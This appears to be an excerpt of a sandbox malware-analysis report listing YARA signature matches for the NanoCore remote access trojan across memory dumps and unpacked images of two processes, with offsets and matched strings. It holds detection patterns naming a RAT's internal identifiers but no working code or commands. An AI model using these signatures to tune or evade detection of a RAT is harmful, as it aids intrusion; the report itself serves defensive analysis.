Process Memory Space: nD2ozRD7MN.exe PID: 7456	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x190ae:$x1: NanoCore.ClientPluginHost 0x24cb0:$x1: NanoCore.ClientPluginHost 0x3c41c:$x1: NanoCore.ClientPluginHost 0x190c8:$x2: IClientNetworkHost 0x24ced:$x2: IClientNetworkHost 0x3c436:$x2: IClientNetworkHost 0x287de:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x33864:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: nD2ozRD7MN.exe PID: 7456	Nanocore	detect Nanocore in memory	JPCERT/CC Incident Response Group	0x259f:$v1: NanoCore Client 0x25fc:$v1: NanoCore Client 0x267b:$v1: NanoCore Client 0x1a5b6:$v1: NanoCore Client 0x1a70e:$v1: NanoCore Client 0x1a724:$v1: NanoCore Client 0x1a978:$v1: NanoCore Client 0x1ddfc:$v1: NanoCore Client 0x1de10:$v1: NanoCore Client 0x1f399:$v1: NanoCore Client 0x2497d:$v1: NanoCore Client 0x2498d:$v1: NanoCore Client 0x24a4c:$v1: NanoCore Client 0x24a5b:$v1: NanoCore Client 0x262a7:$v2: PluginCommand 0x31440:$v2: PluginCommand 0x2628f:$v3: CommandType 0x3142a:$v3: CommandType 0x4026a:$v3: CommandType 0x452f2:$v3: CommandType 0x4b007:$v3: CommandType
Process Memory Space: dnshost.exe PID: 7800	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: dnshost.exe PID: 7800	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x1e9c1:$a1: NanoCore.ClientPluginHost 0x1e984:$a2: NanoCore.ClientPlugin 0x180d0:$b1: get_BuilderSettings 0x1ea0f:$b4: IClientAppHost 0x1ed22:$b6: AddHostEntry 0x1803f:$b7: LogClientException 0x1ed06:$b8: PipeExists 0x1e9fc:$b9: IClientLoggingHost
Process Memory Space: dnshost.exe PID: 7800	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x4570:$a: NanoCore 0x71a9:$a: NanoCore 0x71bd:$a: NanoCore 0x7e8b:$a: NanoCore 0x7ee8:$a: NanoCore 0x7f6d:$a: NanoCore 0x1e92b:$a: NanoCore 0x1e984:$a: NanoCore 0x1e9c1:$a: NanoCore 0x1ea3a:$a: NanoCore 0x1f1c8:$a: NanoCore 0x1f21b:$a: NanoCore 0x1f254:$a: NanoCore 0x1f2c7:$a: NanoCore 0x1fed6:$a: NanoCore 0x20027:$a: NanoCore 0x2003d:$a: NanoCore 0x24da1:$a: NanoCore 0x19c57:$b: ClientPlugin 0x19c98:$b: ClientPlugin 0x1e98d:$b: ClientPlugin
Process Memory Space: dnshost.exe PID: 8060	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 104 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.nD2ozRD7MN.exe.474e28e.7.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x170b:$a1: NanoCore.ClientPluginHost 0x16e2:$a2: NanoCore.ClientPlugin 0x3a54:$b7: LogClientException 0x16f8:$b9: IClientLoggingHost
5.2.nD2ozRD7MN.exe.474e28e.7.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x170b:$x1: NanoCore.ClientPluginHost 0x1725:$x2: IClientNetworkHost
5.2.nD2ozRD7MN.exe.474e28e.7.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x16e2:$x2: NanoCore.ClientPlugin 0x170b:$x3: NanoCore.ClientPluginHost 0x16d3:$i3: IClientNetwork 0x16f8:$i6: IClientLoggingHost 0x1725:$i7: IClientNetworkHost 0x154e:$s1: ClientPlugin 0x16eb:$s1: ClientPlugin
5.2.nD2ozRD7MN.exe.7880000.20.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x2205:$a1: NanoCore.ClientPluginHost 0x227f:$a2: NanoCore.ClientPlugin 0x29a0:$b7: LogClientException 0x221f:$b9: IClientLoggingHost
5.2.nD2ozRD7MN.exe.7880000.20.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x2205:$x1: NanoCore.ClientPluginHost 0x223e:$x2: IClientNetworkHost
5.2.nD2ozRD7MN.exe.7880000.20.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x227f:$x2: NanoCore.ClientPlugin 0x2205:$x3: NanoCore.ClientPluginHost 0x2295:$i3: IClientNetwork 0x221f:$i6: IClientLoggingHost 0x223e:$i7: IClientNetworkHost 0x1f9f:$s1: ClientPlugin 0x2288:$s1: ClientPlugin
5.2.nD2ozRD7MN.exe.7870000.19.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x13a8:$a1: NanoCore.ClientPluginHost 0x13f2:$a2: NanoCore.ClientPlugin 0x13c2:$b9: IClientLoggingHost
5.2.nD2ozRD7MN.exe.7870000.19.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x13a8:$x1: NanoCore.ClientPluginHost
5.2.nD2ozRD7MN.exe.7870000.19.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x13f2:$x2: NanoCore.ClientPlugin 0x13a8:$x3: NanoCore.ClientPluginHost 0x1408:$i3: IClientNetwork 0x13c2:$i6: IClientLoggingHost 0x1185:$s1: ClientPlugin 0x13fb:$s1: ClientPlugin
5.2.nD2ozRD7MN.exe.78a0000.22.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x1deb:$a1: NanoCore.ClientPluginHost 0x1e8b:$a2: NanoCore.ClientPlugin 0x2be1:$b7: LogClientException 0x1e05:$b9: IClientLoggingHost
5.2.nD2ozRD7MN.exe.78a0000.22.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1deb:$x1: NanoCore.ClientPluginHost 0x1e24:$x2: IClientNetworkHost
5.2.nD2ozRD7MN.exe.78a0000.22.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x1e8b:$x2: NanoCore.ClientPlugin 0x1deb:$x3: NanoCore.ClientPluginHost 0x1ea1:$i3: IClientNetwork 0x1e43:$i5: IClientDataHost 0x1e05:$i6: IClientLoggingHost 0x1e24:$i7: IClientNetworkHost 0x266c:$i9: IClientNameObjectCollection 0x1b41:$s1: ClientPlugin 0x1e94:$s1: ClientPlugin 0x2a80:$s2: EndPoint 0x2771:$s3: IPAddress 0x2083:$s4: IPEndPoint 0x27a3:$s7: get_Connected
5.2.nD2ozRD7MN.exe.78c0000.23.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x3d99:$a1: NanoCore.ClientPluginHost 0x3d70:$a2: NanoCore.ClientPlugin 0x3d86:$b9: IClientLoggingHost
5.2.nD2ozRD7MN.exe.78c0000.23.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x3d99:$x1: NanoCore.ClientPluginHost 0x3db3:$x2: IClientNetworkHost
5.2.nD2ozRD7MN.exe.78c0000.23.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x3d70:$x2: NanoCore.ClientPlugin 0x3d99:$x3: NanoCore.ClientPluginHost 0x3d61:$i3: IClientNetwork 0x3d86:$i6: IClientLoggingHost 0x3db3:$i7: IClientNetworkHost 0x3bd4:$s1: ClientPlugin 0x3d79:$s1: ClientPlugin 0x4084:$s2: EndPoint 0x408d:$s3: IPAddress 0x4097:$s4: IPEndPoint
5.2.nD2ozRD7MN.exe.76e0000.16.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x8ba5:$a1: NanoCore.ClientPluginHost 0x8b7f:$a2: NanoCore.ClientPlugin 0x8bbf:$b9: IClientLoggingHost
5.2.nD2ozRD7MN.exe.76e0000.16.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x8ba5:$x1: NanoCore.ClientPluginHost 0x8bd2:$x2: IClientNetworkHost
5.2.nD2ozRD7MN.exe.76e0000.16.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x8b7f:$x2: NanoCore.ClientPlugin 0x8ba5:$x3: NanoCore.ClientPluginHost 0x8b70:$i3: IClientNetwork 0x8b95:$i5: IClientDataHost 0x8bbf:$i6: IClientLoggingHost 0x8bd2:$i7: IClientNetworkHost 0x8be5:$i9: IClientNameObjectCollection 0x8902:$s1: ClientPlugin 0x8b88:$s1: ClientPlugin
5.2.nD2ozRD7MN.exe.7930000.28.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x41ee:$a1: NanoCore.ClientPluginHost 0x41c9:$a2: NanoCore.ClientPlugin 0x41df:$b4: IClientAppHost 0x86ce:$b7: LogClientException 0x4218:$b9: IClientLoggingHost
5.2.nD2ozRD7MN.exe.7930000.28.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x41ee:$x1: NanoCore.ClientPluginHost 0x422b:$x2: IClientNetworkHost
5.2.nD2ozRD7MN.exe.7930000.28.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x41c9:$x2: NanoCore.ClientPlugin 0x41ee:$x3: NanoCore.ClientPluginHost 0x41ba:$i3: IClientNetwork 0x41df:$i4: IClientAppHost 0x4208:$i5: IClientDataHost 0x4218:$i6: IClientLoggingHost 0x422b:$i7: IClientNetworkHost 0x423e:$i8: IClientUIHost 0x424c:$i9: IClientNameObjectCollection 0x3f70:$s1: ClientPlugin 0x41d2:$s1: ClientPlugin
5.2.nD2ozRD7MN.exe.5cd0000.13.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
5.2.nD2ozRD7MN.exe.5cd0000.13.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0xd9ad:$a1: NanoCore.ClientPluginHost 0xd978:$a2: NanoCore.ClientPlugin 0x128f3:$b1: get_BuilderSettings 0x12862:$b7: LogClientException 0xd9c7:$b9: IClientLoggingHost
5.2.nD2ozRD7MN.exe.5cd0000.13.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xd9ad:$x1: NanoCore.ClientPluginHost 0xd9da:$x2: IClientNetworkHost
5.2.nD2ozRD7MN.exe.5cd0000.13.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xd978:$x2: NanoCore.ClientPlugin 0xd9ad:$x3: NanoCore.ClientPluginHost 0xd96c:$i2: IClientData 0xd98e:$i3: IClientNetwork 0xd99d:$i5: IClientDataHost 0xd9c7:$i6: IClientLoggingHost 0xd9da:$i7: IClientNetworkHost 0xd9ed:$i8: IClientUIHost 0xd9fb:$i9: IClientNameObjectCollection 0xda17:$i10: IClientReadOnlyNameObjectCollection 0xd76a:$s1: ClientPlugin 0xd981:$s1: ClientPlugin 0x129a2:$s6: get_ClientSettings
9.2.nD2ozRD7MN.exe.4075ad0.2.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
9.2.nD2ozRD7MN.exe.4075ad0.2.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x1018d:$a1: NanoCore.ClientPluginHost 0x1014d:$a2: NanoCore.ClientPlugin 0x120a6:$b1: get_BuilderSettings 0xffa9:$b2: ClientLoaderForm.resources 0x117c6:$b3: PluginCommand 0x1017e:$b4: IClientAppHost 0x1a5fe:$b5: GetBlockHash 0x126fe:$b6: AddHostEntry 0x163f1:$b7: LogClientException 0x1266b:$b8: PipeExists 0x101b7:$b9: IClientLoggingHost
9.2.nD2ozRD7MN.exe.4075ad0.2.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
9.2.nD2ozRD7MN.exe.4075ad0.2.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
5.2.nD2ozRD7MN.exe.7904c9f.25.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x1a53c:$a1: NanoCore.ClientPluginHost 0x1a513:$a2: NanoCore.ClientPlugin 0x1f567:$b7: LogClientException 0x1a529:$b9: IClientLoggingHost
9.2.nD2ozRD7MN.exe.4075ad0.2.raw.unpack	Nanocore	detect Nanocore in memory	JPCERT/CC Incident Response Group	0xfef5:$v1: NanoCore Client 0xff05:$v1: NanoCore Client 0x117c6:$v2: PluginCommand 0x117ae:$v3: CommandType
5.2.nD2ozRD7MN.exe.7904c9f.25.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1a53c:$x1: NanoCore.ClientPluginHost 0x1a556:$x2: IClientNetworkHost
9.2.nD2ozRD7MN.exe.4075ad0.2.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xfef5:$x1: NanoCore Client 0xff05:$x1: NanoCore Client 0x1014d:$x2: NanoCore.ClientPlugin 0x1018d:$x3: NanoCore.ClientPluginHost 0x10142:$i1: IClientApp 0x10163:$i2: IClientData 0x1016f:$i3: IClientNetwork 0x1017e:$i4: IClientAppHost 0x101a7:$i5: IClientDataHost 0x101b7:$i6: IClientLoggingHost 0x101ca:$i7: IClientNetworkHost 0x101dd:$i8: IClientUIHost 0x101eb:$i9: IClientNameObjectCollection 0x10207:$i10: IClientReadOnlyNameObjectCollection 0xff54:$s1: ClientPlugin 0x10156:$s1: ClientPlugin 0x1064a:$s2: EndPoint 0x10653:$s3: IPAddress 0x1065d:$s4: IPEndPoint 0x12093:$s6: get_ClientSettings 0x12637:$s7: get_Connected
5.2.nD2ozRD7MN.exe.7904c9f.25.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x1a513:$x2: NanoCore.ClientPlugin 0x1a53c:$x3: NanoCore.ClientPluginHost 0x1a504:$i3: IClientNetwork 0x1a529:$i6: IClientLoggingHost 0x1a556:$i7: IClientNetworkHost 0x1a569:$i8: IClientUIHost 0x1a273:$s1: ClientPlugin 0x1a51c:$s1: ClientPlugin
5.2.nD2ozRD7MN.exe.78a0000.22.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x39eb:$a1: NanoCore.ClientPluginHost 0x3a8b:$a2: NanoCore.ClientPlugin 0x47e1:$b7: LogClientException 0x3a05:$b9: IClientLoggingHost
5.2.nD2ozRD7MN.exe.78a0000.22.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x39eb:$x1: NanoCore.ClientPluginHost 0x3a24:$x2: IClientNetworkHost
5.2.nD2ozRD7MN.exe.78a0000.22.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x3a8b:$x2: NanoCore.ClientPlugin 0x39eb:$x3: NanoCore.ClientPluginHost 0x3aa1:$i3: IClientNetwork 0x3a43:$i5: IClientDataHost 0x3a05:$i6: IClientLoggingHost 0x3a24:$i7: IClientNetworkHost 0x426c:$i9: IClientNameObjectCollection 0x3741:$s1: ClientPlugin 0x3a94:$s1: ClientPlugin 0x4680:$s2: EndPoint 0x4371:$s3: IPAddress 0x3c83:$s4: IPEndPoint 0x43a3:$s7: get_Connected
5.2.nD2ozRD7MN.exe.7900000.27.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x1d3db:$a1: NanoCore.ClientPluginHost 0x1d3b2:$a2: NanoCore.ClientPlugin 0x22406:$b7: LogClientException 0x1d3c8:$b9: IClientLoggingHost
5.2.nD2ozRD7MN.exe.7900000.27.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1d3db:$x1: NanoCore.ClientPluginHost 0x1d3f5:$x2: IClientNetworkHost
5.2.nD2ozRD7MN.exe.7900000.27.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x1d3b2:$x2: NanoCore.ClientPlugin 0x1d3db:$x3: NanoCore.ClientPluginHost 0x1d3a3:$i3: IClientNetwork 0x1d3c8:$i6: IClientLoggingHost 0x1d3f5:$i7: IClientNetworkHost 0x1d408:$i8: IClientUIHost 0x1d112:$s1: ClientPlugin 0x1d3bb:$s1: ClientPlugin
5.2.nD2ozRD7MN.exe.7860000.18.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x5b0b:$a1: NanoCore.ClientPluginHost 0x5b87:$a2: NanoCore.ClientPlugin 0x6710:$b7: LogClientException 0x5b25:$b9: IClientLoggingHost
5.2.nD2ozRD7MN.exe.7860000.18.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x5b0b:$x1: NanoCore.ClientPluginHost 0x5b44:$x2: IClientNetworkHost
5.2.nD2ozRD7MN.exe.7860000.18.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x5b87:$x2: NanoCore.ClientPlugin 0x5b0b:$x3: NanoCore.ClientPluginHost 0x5b9d:$i3: IClientNetwork 0x5b25:$i6: IClientLoggingHost 0x5b44:$i7: IClientNetworkHost 0x57fb:$s1: ClientPlugin 0x5b90:$s1: ClientPlugin 0x6cf4:$s3: IPAddress
12.2.nD2ozRD7MN.exe.3c84c45.2.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
12.2.nD2ozRD7MN.exe.3c84c45.2.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0xb184:$a1: NanoCore.ClientPluginHost 0x24168:$a1: NanoCore.ClientPluginHost 0xb14f:$a2: NanoCore.ClientPlugin 0x24133:$a2: NanoCore.ClientPlugin 0x100ca:$b1: get_BuilderSettings 0x290ae:$b1: get_BuilderSettings 0x10039:$b7: LogClientException 0x2901d:$b7: LogClientException 0xb19e:$b9: IClientLoggingHost 0x24182:$b9: IClientLoggingHost
12.2.nD2ozRD7MN.exe.3c84c45.2.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xb184:$x1: NanoCore.ClientPluginHost 0x24168:$x1: NanoCore.ClientPluginHost 0xb1b1:$x2: IClientNetworkHost 0x24195:$x2: IClientNetworkHost
12.2.nD2ozRD7MN.exe.3c84c45.2.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xb14f:$x2: NanoCore.ClientPlugin 0x24133:$x2: NanoCore.ClientPlugin 0xb184:$x3: NanoCore.ClientPluginHost 0x24168:$x3: NanoCore.ClientPluginHost 0xb143:$i2: IClientData 0x24127:$i2: IClientData 0xb165:$i3: IClientNetwork 0x24149:$i3: IClientNetwork 0xb174:$i5: IClientDataHost 0x24158:$i5: IClientDataHost 0xb19e:$i6: IClientLoggingHost 0x24182:$i6: IClientLoggingHost 0xb1b1:$i7: IClientNetworkHost 0x24195:$i7: IClientNetworkHost 0xb1c4:$i8: IClientUIHost 0x241a8:$i8: IClientUIHost 0xb1d2:$i9: IClientNameObjectCollection 0x241b6:$i9: IClientNameObjectCollection 0xb1ee:$i10: IClientReadOnlyNameObjectCollection 0x241d2:$i10: IClientReadOnlyNameObjectCollection 0xaf41:$s1: ClientPlugin
9.2.nD2ozRD7MN.exe.4075ad0.2.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
9.2.nD2ozRD7MN.exe.4075ad0.2.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0xe38d:$a1: NanoCore.ClientPluginHost 0xe34d:$a2: NanoCore.ClientPlugin 0x102a6:$b1: get_BuilderSettings 0xe1a9:$b2: ClientLoaderForm.resources 0xf9c6:$b3: PluginCommand 0xe37e:$b4: IClientAppHost 0x187fe:$b5: GetBlockHash 0x108fe:$b6: AddHostEntry 0x145f1:$b7: LogClientException 0x1086b:$b8: PipeExists 0xe3b7:$b9: IClientLoggingHost
9.2.nD2ozRD7MN.exe.4075ad0.2.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
9.2.nD2ozRD7MN.exe.4075ad0.2.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
9.2.nD2ozRD7MN.exe.4075ad0.2.unpack	Nanocore	detect Nanocore in memory	JPCERT/CC Incident Response Group	0xe0f5:$v1: NanoCore Client 0xe105:$v1: NanoCore Client 0xf9c6:$v2: PluginCommand 0xf9ae:$v3: CommandType
9.2.nD2ozRD7MN.exe.4075ad0.2.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xe0f5:$x1: NanoCore Client 0xe105:$x1: NanoCore Client 0xe34d:$x2: NanoCore.ClientPlugin 0xe38d:$x3: NanoCore.ClientPluginHost 0xe342:$i1: IClientApp 0xe363:$i2: IClientData 0xe36f:$i3: IClientNetwork 0xe37e:$i4: IClientAppHost 0xe3a7:$i5: IClientDataHost 0xe3b7:$i6: IClientLoggingHost 0xe3ca:$i7: IClientNetworkHost 0xe3dd:$i8: IClientUIHost 0xe3eb:$i9: IClientNameObjectCollection 0xe407:$i10: IClientReadOnlyNameObjectCollection 0xe154:$s1: ClientPlugin 0xe356:$s1: ClientPlugin 0xe84a:$s2: EndPoint 0xe853:$s3: IPAddress 0xe85d:$s4: IPEndPoint 0x10293:$s6: get_ClientSettings 0x10837:$s7: get_Connected
5.2.nD2ozRD7MN.exe.7890000.21.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x59eb:$a1: NanoCore.ClientPluginHost 0x5ad5:$a2: NanoCore.ClientPlugin 0x732e:$b7: LogClientException 0x6941:$b8: PipeExists 0x5a05:$b9: IClientLoggingHost
5.2.nD2ozRD7MN.exe.7890000.21.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x59eb:$x1: NanoCore.ClientPluginHost 0x5b48:$x2: IClientNetworkHost
5.2.nD2ozRD7MN.exe.7890000.21.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x5ad5:$x2: NanoCore.ClientPlugin 0x59eb:$x3: NanoCore.ClientPluginHost 0x5aeb:$i3: IClientNetwork 0x5a24:$i5: IClientDataHost 0x5a05:$i6: IClientLoggingHost 0x5b48:$i7: IClientNetworkHost 0x5a43:$i8: IClientUIHost 0x6955:$i9: IClientNameObjectCollection 0x54fc:$s1: ClientPlugin 0x5ade:$s1: ClientPlugin 0x6971:$s6: get_ClientSettings
12.2.nD2ozRD7MN.exe.3c8061c.3.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
12.2.nD2ozRD7MN.exe.3c8061c.3.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0xd9ad:$a1: NanoCore.ClientPluginHost 0xd978:$a2: NanoCore.ClientPlugin 0x128f3:$b1: get_BuilderSettings 0x12862:$b7: LogClientException 0xd9c7:$b9: IClientLoggingHost
12.2.nD2ozRD7MN.exe.3c8061c.3.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xd9ad:$x1: NanoCore.ClientPluginHost 0xd9da:$x2: IClientNetworkHost
12.2.nD2ozRD7MN.exe.3c8061c.3.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xd978:$x2: NanoCore.ClientPlugin 0xd9ad:$x3: NanoCore.ClientPluginHost 0xd96c:$i2: IClientData 0xd98e:$i3: IClientNetwork 0xd99d:$i5: IClientDataHost 0xd9c7:$i6: IClientLoggingHost 0xd9da:$i7: IClientNetworkHost 0xd9ed:$i8: IClientUIHost 0xd9fb:$i9: IClientNameObjectCollection 0xda17:$i10: IClientReadOnlyNameObjectCollection 0xd76a:$s1: ClientPlugin 0xd981:$s1: ClientPlugin 0x129a2:$s6: get_ClientSettings
5.2.nD2ozRD7MN.exe.473fe5e.4.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x3d99:$a1: NanoCore.ClientPluginHost 0xcd3b:$a1: NanoCore.ClientPluginHost 0x3d70:$a2: NanoCore.ClientPlugin 0xcd12:$a2: NanoCore.ClientPlugin 0x3d86:$b9: IClientLoggingHost 0xcd28:$b9: IClientLoggingHost
5.2.nD2ozRD7MN.exe.473fe5e.4.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x3d99:$x1: NanoCore.ClientPluginHost 0xcd3b:$x1: NanoCore.ClientPluginHost 0x3db3:$x2: IClientNetworkHost 0xcd55:$x2: IClientNetworkHost
5.2.nD2ozRD7MN.exe.473fe5e.4.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x3d70:$x2: NanoCore.ClientPlugin 0xcd12:$x2: NanoCore.ClientPlugin 0x3d99:$x3: NanoCore.ClientPluginHost 0xcd3b:$x3: NanoCore.ClientPluginHost 0x3d61:$i3: IClientNetwork 0xcd03:$i3: IClientNetwork 0x3d86:$i6: IClientLoggingHost 0xcd28:$i6: IClientLoggingHost 0x3db3:$i7: IClientNetworkHost 0xcd55:$i7: IClientNetworkHost 0x3bd4:$s1: ClientPlugin 0x3d79:$s1: ClientPlugin 0xcb7e:$s1: ClientPlugin 0xcd1b:$s1: ClientPlugin 0x4084:$s2: EndPoint 0x408d:$s3: IPAddress 0x4097:$s4: IPEndPoint
5.2.nD2ozRD7MN.exe.3441e00.3.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x6da5:$a1: NanoCore.ClientPluginHost 0x6d7f:$a2: NanoCore.ClientPlugin 0x6dbf:$b9: IClientLoggingHost
5.2.nD2ozRD7MN.exe.3441e00.3.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x6da5:$x1: NanoCore.ClientPluginHost 0x6dd2:$x2: IClientNetworkHost
5.2.nD2ozRD7MN.exe.3441e00.3.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x6d7f:$x2: NanoCore.ClientPlugin 0x6da5:$x3: NanoCore.ClientPluginHost 0x6d70:$i3: IClientNetwork 0x6d95:$i5: IClientDataHost 0x6dbf:$i6: IClientLoggingHost 0x6dd2:$i7: IClientNetworkHost 0x6de5:$i9: IClientNameObjectCollection 0x6b02:$s1: ClientPlugin 0x6d88:$s1: ClientPlugin
5.2.nD2ozRD7MN.exe.45e9ad7.8.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x1a53c:$a1: NanoCore.ClientPluginHost 0x1a513:$a2: NanoCore.ClientPlugin 0x1f567:$b7: LogClientException 0x1a529:$b9: IClientLoggingHost
5.2.nD2ozRD7MN.exe.45e9ad7.8.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1a53c:$x1: NanoCore.ClientPluginHost 0x1a556:$x2: IClientNetworkHost
5.2.nD2ozRD7MN.exe.45e9ad7.8.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x1a513:$x2: NanoCore.ClientPlugin 0x1a53c:$x3: NanoCore.ClientPluginHost 0x1a504:$i3: IClientNetwork 0x1a529:$i6: IClientLoggingHost 0x1a556:$i7: IClientNetworkHost 0x1a569:$i8: IClientUIHost 0x1a273:$s1: ClientPlugin 0x1a51c:$s1: ClientPlugin
5.2.nD2ozRD7MN.exe.78c0000.23.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x5b99:$a1: NanoCore.ClientPluginHost 0x5b70:$a2: NanoCore.ClientPlugin 0x5b86:$b9: IClientLoggingHost
5.2.nD2ozRD7MN.exe.78c0000.23.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x5b99:$x1: NanoCore.ClientPluginHost 0x5bb3:$x2: IClientNetworkHost
